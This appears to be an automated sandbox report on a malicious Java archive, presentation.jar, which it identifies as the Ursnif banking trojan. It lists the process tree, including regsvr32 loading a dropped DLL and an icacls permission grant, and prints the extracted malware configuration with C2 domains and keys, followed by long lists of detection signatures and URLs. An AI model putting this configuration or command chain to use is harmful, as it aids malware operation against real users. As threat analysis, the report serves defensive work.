Loading ...

Play interactive tourEdit tour

Analysis Report presentation.jar

Overview

General Information

Sample Name:presentation.jar
Analysis ID:406076
MD5:6c5e7908c3a06aafd6dcebc8a2dcb674
SHA1:d094aef9d24e13ab70f2ef767242be554ed855ae
SHA256:cb8b20c28a0ac697b6f5bd430bd86762f6b9ef635428fe3fe77e174b172ac6f4
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Exploit detected, runtime environment dropped PE file
Exploit detected, runtime environment starts unknown processes
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • cmd.exe (PID: 6008 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar'' >> C:\cmdlinestart.log 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • java.exe (PID: 5732 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar' MD5: 28733BA8C383E865338638DF5196E6FE)
      • icacls.exe (PID: 3160 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 2168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • iexplore.exe (PID: 4812 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.java.com/ MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 6028 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4812 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • regsvr32.exe (PID: 6560 cmdline: regsvr32.exe /s C:\Users\user\AppData\Local\broker.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "C6HtybW6gOadm/yj7zZMo6G6KXFQ4dEp7zHfMW5IRELO0uvqi07MPT6/x9S6litknH+BvSY8WUJSCe++K06Znqzju0G9p4s7vFCRkOmz8D6jF964Fzsv95HaHsXi47+U2GiQ2Gikw0inkLSb2F3I2SWzZYUSFyC2M/2JSO9/RfzN4fQovVmdO23GnRaRT7RQ80xdzZmG/1KSXrPdpz6L0pheEWvnVtXAtJsxn0oJ2Av+YPARe6ceA0vZDing87oj0OaTGGHfCE60e2J7m50kPk40R/wZ5kCD/nJn2jktSyio6o+GuLZKR/fZyVreMHafB6O7UghEGnsrn77tN0EAJaA+F5jMamer1uRrqfAyszw=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "2500", "server": "580", "serpent_key": "ZihFTxUSedu9uCzM", "sleep_time": "10", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000003.401528922.0000000003200000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    10.3.regsvr32.exe.3208d23.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      10.2.regsvr32.exe.4d70000.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

        Sigma Overview

        No Sigma rule has matched

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 10.3.regsvr32.exe.3208d23.0.raw.unpackMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "C6HtybW6gOadm/yj7zZMo6G6KXFQ4dEp7zHfMW5IRELO0uvqi07MPT6/x9S6litknH+BvSY8WUJSCe++K06Znqzju0G9p4s7vFCRkOmz8D6jF964Fzsv95HaHsXi47+U2GiQ2Gikw0inkLSb2F3I2SWzZYUSFyC2M/2JSO9/RfzN4fQovVmdO23GnRaRT7RQ80xdzZmG/1KSXrPdpz6L0pheEWvnVtXAtJsxn0oJ2Av+YPARe6ceA0vZDing87oj0OaTGGHfCE60e2J7m50kPk40R/wZ5kCD/nJn2jktSyio6o+GuLZKR/fZyVreMHafB6O7UghEGnsrn77tN0EAJaA+F5jMamer1uRrqfAyszw=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "2500", "server": "580", "serpent_key": "ZihFTxUSedu9uCzM", "sleep_time": "10", "SetWaitableTimer_value": "10"}
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\broker.dllReversingLabs: Detection: 27%
        Multi AV Scanner detection for submitted fileShow sources
        Source: presentation.jarVirustotal: Detection: 19%Perma Link
        Source: presentation.jarReversingLabs: Detection: 41%
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
        Source: unknownHTTPS traffic detected: 143.204.209.41:443 -> 192.168.2.3:49722 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 143.204.209.41:443 -> 192.168.2.3:49723 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 143.204.209.31:443 -> 192.168.2.3:49729 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 143.204.209.31:443 -> 192.168.2.3:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 143.204.209.88:443 -> 192.168.2.3:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 143.204.209.88:443 -> 192.168.2.3:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 35.181.18.61:443 -> 192.168.2.3:49734 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 35.181.18.61:443 -> 192.168.2.3:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 34.202.206.65:443 -> 192.168.2.3:49737 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 34.202.206.65:443 -> 192.168.2.3:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 50.87.249.219:443 -> 192.168.2.3:49735 version: TLS 1.2
        Source: Binary string: c:\119\Minute\Force_Lead\Apple\oil.pdb source: regsvr32.exe, 0000000A.00000002.477390271.0000000004DA4000.00000002.00020000.sdmp, broker.dll.2.dr

        Software Vulnerabilities:

        barindex
        Exploit detected, runtime environment starts unknown processesShow sources
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Program Files\internet explorer\iexplore.exe
        Source: Joe Sandbox ViewIP Address: 34.202.206.65 34.202.206.65
        Source: Joe Sandbox ViewIP Address: 35.181.18.61 35.181.18.61
        Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
        Source: Joe Sandbox ViewJA3 fingerprint: d2935c58fe676744fecc8614ee5356c7
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
        Source: msapplication.xml0.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x1d5bee6a,0x01d742dc</date><accdate>0x1d5bee6a,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
        Source: msapplication.xml0.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x1d5bee6a,0x01d742dc</date><accdate>0x1d5bee6a,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
        Source: msapplication.xml5.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1d60b326,0x01d742dc</date><accdate>0x1d60b326,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
        Source: msapplication.xml5.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1d60b326,0x01d742dc</date><accdate>0x1d60b326,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
        Source: msapplication.xml7.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x1d60b326,0x01d742dc</date><accdate>0x1d60b326,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
        Source: msapplication.xml7.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x1d60b326,0x01d742dc</date><accdate>0x1d63157d,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
        Source: unknownDNS traffic detected: queries for: www.java.com
        Source: java.exe, 00000002.00000002.257518296.0000000016740000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
        Source: java.exe, 00000002.00000002.253067273.000000000A626000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
        Source: java.exe, 00000002.00000002.250698316.0000000005073000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
        Source: java.exe, 00000002.00000002.257518296.0000000016740000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
        Source: java.exe, 00000002.00000002.251400043.000000000A1C5000.00000004.00000001.sdmpString found in binary or memory: http://bugreport.sun.com/bugreport/
        Source: 0D070042D9C67A68E1A4BF804E6E0E06.cache[1].htm.8.drString found in binary or memory: http://bugs.webkit.org/show_bug.cgi?id=3810
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
        Source: notice[1].js0.8.drString found in binary or memory: http://consent-pref.trustarc.com/?type=oracle6
        Source: notice[1].js0.8.drString found in binary or memory: http://consent.trustarc.com/
        Source: notice[1].js0.8.drString found in binary or memory: http://consent.trustarc.com/bannermsg?
        Source: notice[1].js0.8.drString found in binary or memory: http://consent.trustarc.com/noticemsg?
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
        Source: java.exe, 00000002.00000002.253067273.000000000A626000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org
        Source: java.exe, 00000002.00000002.250698316.0000000005073000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
        Source: java.exe, 00000002.00000002.253067273.000000000A626000.00000004.00000001.sdmp, java.exe, 00000002.00000002.250716526.0000000005079000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org
        Source: java.exe, 00000002.00000002.250698316.0000000005073000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
        Source: java.exe, 00000002.00000002.250716526.0000000005079000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org;
        Source: java.exe, 00000002.00000002.250716526.0000000005079000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.orgC
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
        Source: java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
        Source: java.exe, 00000002.00000002.253730182.00000000151A9000.00000004.00000001.sdmp, SECURE_VIEWER.RSAString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
        Source: java.exe, 00000002.00000002.253730182.00000000151A9000.00000004.00000001.sdmp, SECURE_VIEWER.RSAString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: java.exe, 00000002.00000002.252170315.000000000A367000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl
        Source: java.exe, 00000002.00000002.252170315.000000000A367000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: java.exe, 00000002.00000002.253067273.000000000A626000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl
        Source: java.exe, 00000002.00000002.250698316.0000000005073000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
        Source: java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl
        Source: java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmp, SECURE_VIEWER.RSAString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
        Source: java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt
        Source: java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmp, SECURE_VIEWER.RSAString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
        Source: renderer[1].js.8.drString found in binary or memory: http://github.com/requirejs/text/LICENSE
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
        Source: get[1].js.8.drString found in binary or memory: http://inforoom.truste.com
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
        Source: java.exe, 00000002.00000002.251436069.000000000A1D5000.00000004.00000001.sdmpString found in binary or memory: http://java.oracle.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
        Source: java.exe, 00000002.00000003.230125961.0000000015AE4000.00000004.00000001.sdmp, java.exe, 00000002.00000003.229309948.0000000015298000.00000004.00000001.sdmp, java.exe, 00000002.00000002.252170315.000000000A367000.00000004.00000001.sdmpString found in binary or memory: http://null.oracle.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
        Source: java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com
        Source: java.exe, 00000002.00000002.253730182.00000000151A9000.00000004.00000001.sdmp, SECURE_VIEWER.RSAString found in binary or memory: http://ocsp.comodoca.com0
        Source: java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com
        Source: java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmp, SECURE_VIEWER.RSAString found in binary or memory: http://ocsp.sectigo.com0
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
        Source: render[1].js0.8.drString found in binary or memory: http://oss.oracle.com/licenses/upl.
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
        Source: 1.cache[1].js.8.drString found in binary or memory: http://ph-truste-stage.truste-svc.net/js/cookie_iframe.html
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://policy.camerfirma.com
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://policy.camerfirma.com0
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
        Source: java.exe, 00000002.00000002.253067273.000000000A626000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/
        Source: java.exe, 00000002.00000002.250698316.0000000005073000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0
        Source: java.exe, 00000002.00000002.250716526.0000000005079000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/S
        Source: java.exe, 00000002.00000002.250716526.0000000005079000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/k
        Source: java.exe, 00000002.00000002.253067273.000000000A626000.00000004.00000001.sdmp, java.exe, 00000002.00000002.250716526.0000000005079000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org
        Source: java.exe, 00000002.00000002.250698316.0000000005073000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
